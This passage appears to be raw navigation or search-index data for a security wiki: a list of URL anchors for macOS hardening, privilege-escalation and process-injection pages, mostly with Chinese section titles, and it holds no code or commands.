macos-files-folders-and-binaries/macos-installers-abuse.html#macos-安装程序滥用","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#pkg-基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#层次结构","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#解压缩","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#dmg-基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#层级结构","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#通过-pkg-滥用进行特权提升","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#从公共目录执行","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#authorizationexecutewithprivileges","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#执行通过挂载","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#pkg-作为恶意软件","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#空载荷","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#分发-xml-中的-js","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#后门安装程序","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#macos-内存转储","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#内存伪影","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#交换文件","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#休眠映像","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#内存压力日志","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#使用-osxpmem-转储内存","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#macos-敏感位置与有趣的守护进程","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#密码","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#隐藏密码","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#etcmasterpasswd","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#keychain-dump","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#keychaindump","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#keychaindump-概述","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#chainbreaker","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#kcpassword","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#interesting-information-in-databases","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#messages","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#通知","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#notes","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#preferences","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#opendirectory-permissionsplist","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#系统通知","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#darwin-通知","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#分布式通知中心","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#苹果推送通知-apn","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#用户通知","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#macos-universal-binaries--mach-o-format","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#fat-header","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-header","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-文件类型","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-标志","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-加载命令","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_segmentlc_segment_64","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_unixthreadlc_main","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_code_signature","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_encryption_info_64","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_load_dylinker","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_ident","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_uuid","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_dyld_environment","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_load_dylib","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-数据","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#objetive-c-常见部分","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#swift","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#macos-objective-c","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#objective-c","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#类方法和对象","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#接口属性和方法","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#类","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#对象与调用方法","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#类方法","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#setter--getter","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#实例变量","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#协议","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#一起","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#基本类","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#blocks","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#文件","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#macos-提权","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#tcc-提权","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#linux-提权","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#用户交互","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#sudo-劫持","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#dock-冒充","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#tcc---root-权限提升","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#cve-2020-9771---mount_apfs-tcc-绕过和权限提升","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#敏感信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#macos-进程滥用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#进程基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#pids","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#进程组会话与联盟","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#凭证与角色","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#线程基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#线程局部变量-tlv","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#线程优先级","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#macos-进程滥用-1","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#库注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#函数钩子","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#进程间通信","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#electron-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#chromium-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#脏-nib","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#java-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#net-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#perl-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#ruby-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#python-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#检测","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#shield","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#其他进程发出的调用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#macos-dirty-nib","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#what-are-nibxib-files","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#dirty-nib-injection-process-attacker-view","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#modern-macos-protections-venturamontereysonomasequoia","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#addressing-launch-constraints","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#enumerating-targets-and-nibs-useful-for-research--legacy-systems","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#检测与-dfir-建议","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#防御加固开发者和防御者","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#hacktricks-相关阅读","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#参考资料","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#macos-chromium-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#工具","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#参考","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#macos-electron-applications-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#electron-fuses","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#检查-electron-fuses","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#修改-electron-fuses","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#向-electron-应用程序添加-rce-代码","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#rce-with-electron_run_as_node","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#从应用程序-plist-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#rce-with-node_options","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#从-app-plist-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#rce-with-inspecting","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#从应用程序-plist-注入-1","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#tcc-bypass-abusing-older-versions","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#run-non-js-code","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#notable-electron-macos-vulnerabilities-2023-2024","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#cve-2023-44402--asar-integrity-bypass","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#2024-runasnode--enablenodecliinspectarguments-cve-cluster","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#automatic-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#references","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#macos-函数钩子","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#函数插入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#插入-printf","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#动态插入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#方法交换","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#访问原始方法","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#method-swizzling-with-method_exchangeimplementations","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#使用-method_setimplementation-进行方法交换","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#hooking-attack-methodology","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#参考","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#macos-ipc---进程间通信","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#mach-通过端口进行消息传递","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#端口权限","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#文件端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#建立通信","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#一个-mach-消息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#mac-ports-apis","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#调试-mach_msg","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#枚举端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#代码示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#特权端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#主机特殊端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#任务特殊端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#任务端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#线程端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#通过任务端口在线程中注入shellcode","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#通过任务端口在线程中注入-dylib","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#线程劫持通过任务端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#任务端口注入检测","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#异常端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#其他对象","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#时钟","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#处理器和处理器集","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#macos-mig---mach-interface-generator","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#ndr_record","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#二进制分析","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#jtool","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#assembly","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#debug","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#references","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#macos-xpc","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#应用特定的-xpc-服务","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#系统范围的-xpc-服务","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc-对象","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc-服务","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#启动服务","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc事件消息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc连接进程检查","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc授权","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc嗅探器","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc-通信-c-代码示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc-通信-objective-c-代码示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#客户端在-dylb-代码中","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#remote-xpc","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#macos-xpc-授权","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#xpc-授权","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#shouldacceptnewconnection-始终为-yes","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#应用程序权限","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#权限验证","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#db-信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#宽松权限","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#反向授权","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#检查是否使用了-evenbetterauthorization","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#协议通信","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#利用示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#其他被滥用的-xpc-权限助手","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#macos-xpc-连接进程检查","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#xpc-连接进程检查","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#通信攻击","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#trustcache---降级攻击防范","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#代码示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#macos-pid-重用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#pid-重用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#利用示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#其他示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#macos-xpc_connection_get_audit_token-攻击","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#mach-消息基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#xpc-连接","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#漏洞总结","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#变体-1在事件处理程序外部调用-xpc_connection_get_audit_token","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#变体-2回复转发","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#发现问题","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#修复","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#macos-通过任务端口进行线程注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#代码","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#1-线程劫持","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#2-用于通信的-mach-端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#3-基本内存读写原语","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#使用执行原语进行内存读写","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#识别合适的函数","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#4-共享内存设置","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#进程概述","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#5-实现完全控制","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#6-apple-silicon-arm64e-的细微差别","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#7-使用-endpointsecurity-进行检测和加固","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#加固运行时考虑","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#8-最近的公共工具2023-2025","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.html#macos-java-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.html#枚举","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.html#_java_options","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.html#vmoptions-文件","macos-hardening/macos-security-and-privilege-escalation/macos-p